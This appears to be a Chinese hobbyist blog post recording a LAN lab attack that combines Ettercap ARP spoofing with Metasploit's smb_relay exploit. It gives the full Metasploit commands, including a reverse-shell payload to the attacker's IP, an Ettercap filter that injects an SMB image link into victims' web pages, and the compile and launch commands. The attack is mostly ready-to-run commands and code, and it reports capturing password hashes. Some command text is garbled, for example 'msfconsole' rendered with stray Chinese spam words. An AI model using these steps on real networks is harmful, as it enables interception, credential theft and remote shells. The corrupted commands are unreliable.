前言
昨天看到Mickey牛的那篇HaveFunWithEttercapFilterInLAN.pdf文档。于是今天就去机房试验了一下。遂记下实验记录,有兴趣的童鞋可以参考Mickey的文档http://wenku.baidu.com/view/4df554fafab069dc5022019e.html
#主要是利用ettercapARP嗅探和metasploit/windows/smb/smb_relay这个exp
环境。内网啦一个交换机下mycomputer#Backtrack4IP192.168.0.45
#targetwin_xpIP192.168.0.99
1.我们首先配置metaspliot
./m单机传奇console//启动metasoloitBacktrack4默认是root权限
useexploit/windows/smb/smb_relay//使用smb_relayexp
setPAYLOADwindows/shell_reverse_tcp//设置payload模块反弹回来用的东东
setSVRHOST192.168.0.45//设置本机IP
setSVPORT53//设置本机端口
exploit//开始利用
2.需要一份Ettercap的Filter过滤脚本直接COPYMickey牛文档里面的做一个修改
[pre]if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data,"Accept-Encoding")) { replace("Accept-Encoding","Accept-Mousecat"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("</body>","<img src=\"\\\\192.168.0.45\\fvck.jpg\"> </body>" "); replace("</Body>","<img src=\"\\\\192.168.0.45\\fvck.jpg\"> </body>" "); msg("Filter Ran.\n"); } [/pre]
复制代码这段代码。
我们也只需要修改IP就OK拉。然后把这段代码保存一个你觉得nb的名字好了我这里保存为net.filter
3编译一下这个net.filtet
命令:etterfilternet.filter-onet.ef//不要忘记后缀哦
然后我们得到了net.filternet.ef2个文件啦!
4开始邪恶吧
攻击某个IP就直接这样可以了ettercap-T-q-Fsmbrelay.ef-MARP/192.168.0.99///
各参数意义如下:
-T:使用TEXT模式启动
-q:启用安静模式
-F:加载指定的filter
-M:指定使用ARP模块
当你的目标浏览网页的时候metasploit就应该有反应哦!不过mickey牛说的可以反弹回来cmdshell。我一直没成功不过在ettercap里面倒是看到了目标机器的hash。所以这样或许可以来弄hash。。C段的时候
不知道这个方式可行不!
笔记本没电了。该睡觉了。Mickey牛的文档后面还有个东东没说。大家看看那份文档吧。。Goodnight
*
* |